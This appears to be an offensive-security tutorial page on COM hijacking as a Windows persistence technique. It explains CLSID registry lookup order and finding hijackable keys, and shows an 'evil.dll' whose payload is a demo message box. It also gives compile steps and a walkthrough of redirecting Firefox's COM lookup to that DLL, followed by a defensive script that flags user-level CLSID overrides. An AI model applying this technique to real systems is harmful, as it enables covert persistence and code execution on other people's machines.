Secondary Categories: 02-Malware 02-Persistence
Description:
The Component Object Model (COM) was introduced in Windows 3.11 and is an object-oriented system for creating binary software components that can interact with each other. The technology lets a program reuse components without knowing how they are implemented internally.
When a program needs to load a COM object, it calls the Windows API CoCreateInstance to construct an uninitialized instance of a specific class, passing the CLSID (class identifier) as one of the required parameters. When a program calls CoCreateInstance with a particular CLSID value, the operating system consults the registry to discover which binary contains the requested COM code.
As seen in the screenshot above, the CLSID A1DB7B5E-D0EA-4FE0-93C4-314505788272 has an InProcServer32 subkey whose default registry value is TaskflowDataEngine.dll.
Depending on how the program is run, the server path could be in one of the following subkeys:
- InprocServer/InprocServer32
- LocalServer/LocalServer32
- TreatAs
- ProgID
and the top-level key in the registry would be one of:
- HKEY_CURRENT_USER\Software\Classes\<CLSID>
- HKEY_LOCAL_MACHINE\Software\Classes\<CLSID>
Discovery
To find COM keys that could be used for hijacking, you can use Procmon with the following filters:
It is also worth adding a filter that excludes events whose path starts with HKLM.
When loading a COM object, HKEY_CURRENT_USER (HKCU) is examined first, giving preference to user-specified COM objects. The COM object is then looked up in HKEY_CLASSES_ROOT (HKCR), which is really just HKLM.
Example
In the example below, firefox.exe looks up the COM object with the CLSID A6FF50C0-56C0-71CA-5732-BED303A59628. If we search for this CLSID in the HKCU registry we can see that it is not found, but it is found in the HKCR registry.
We can then export this entry and modify it to include our malicious DLL.
The code being executed:
```cpp
/*
evil.cpp
simple DLL for DLL inject to process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

// DllMain runs when the DLL is mapped into (or unmapped from) a process.
// Once the hijacked CLSID points here, the host process loads this DLL and
// DLL_PROCESS_ATTACH fires, so the payload below runs inside that process.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
    switch (nReason) {
    case DLL_PROCESS_ATTACH:
        // Demo payload: a message box proves the DLL was loaded.
        MessageBox(
            NULL,
            "Meow from evil.dll!",
            "=^..^=",
            MB_OK
        );
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}
```
Compiling the DLL:
```sh
x86_64-w64-mingw32-g++ -shared -o evil.dll evil.cpp -fpermissive
```
Now, with our registry export file modified and a working malicious DLL, we can import it into the registry.
Once this is done we can close Firefox, re-run it, and see that our malicious DLL is run.
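The lookup order described above (HKCU before HKLM) is what makes the modified export effective, and it is also what a defender can check for. As an added example that is not part of the original page, this Python script parses a .reg export of both hives and flags every user-level CLSID server entry, recording which machine-wide entry it shadows and whether the path lies outside the system directories; the export text, paths and DLL names are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed .reg export (sample data, not from the page): one CLSID registered under HKLM
# and a user-level copy under HKCU pointing at a DLL in a profile directory (paths made up).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32]
@="C:\\Windows\\System32\\example.dll"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32]
@="C:\\Users\\user\\AppData\\Roaming\\evil.dll"
"ThreadingModel"="Apartment"
"""

# Subkeys whose default value names what COM loads (a binary, or for TreatAs another CLSID).
SERVER_KEYS = {"inprocserver", "inprocserver32", "localserver", "localserver32", "treatas"}
KEY_RE = re.compile(r"^\[(HKEY_[A-Z_]+)\\Software\\Classes\\CLSID\\(\{[0-9A-F-]+\})\\([A-Z0-9]+)\]$", re.I)
DEFAULT_RE = re.compile(r'^@="(.*)"$')
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def parse_export(text):
    """Return {hive: {clsid: {subkey: default value}}} for CLSID server subkeys in a .reg export."""
    servers = defaultdict(lambda: defaultdict(dict))
    current = None
    for line in (l.strip() for l in text.splitlines()):
        m = KEY_RE.match(line)
        if m:
            hive, clsid, subkey = m.group(1).upper(), m.group(2).upper(), m.group(3)
            current = (hive, clsid, subkey) if subkey.lower() in SERVER_KEYS else None
        elif current and DEFAULT_RE.match(line):
            # .reg files double backslashes inside string values; undo that.
            value = DEFAULT_RE.match(line).group(1).replace("\\\\", "\\")
            servers[current[0]][current[1]][current[2]] = value
    return servers

def find_user_overrides(servers):
    """Flag every HKCU server entry: HKCU is consulted before HKLM, so it wins for that CLSID."""
    hkcu = servers.get("HKEY_CURRENT_USER", {})
    hklm = servers.get("HKEY_LOCAL_MACHINE", {})
    findings = []
    for clsid, subkeys in hkcu.items():
        for subkey, path in subkeys.items():
            findings.append({"clsid": clsid, "subkey": subkey, "path": path,
                             # the machine-wide entry this user key shadows, if any
                             "shadows_hklm": hklm.get(clsid, {}).get(subkey),
                             "outside_system_dirs": not path.lower().startswith(TRUSTED_PREFIXES)})
    return findings
```

The same parser works on a full export of both Software\Classes\CLSID trees, which is the quickest offline way to list every CLSID a user has overridden.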
Extra
Note that once our DLL is run by Firefox, we can use Process Hacker to get the PID. The PID for the message box is 9272, but if we view the Firefox process and its child processes, PID 9272 is not among them.
Resources:
| Title | URL |
|---|---|
| COM DLL Hijacking | https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html |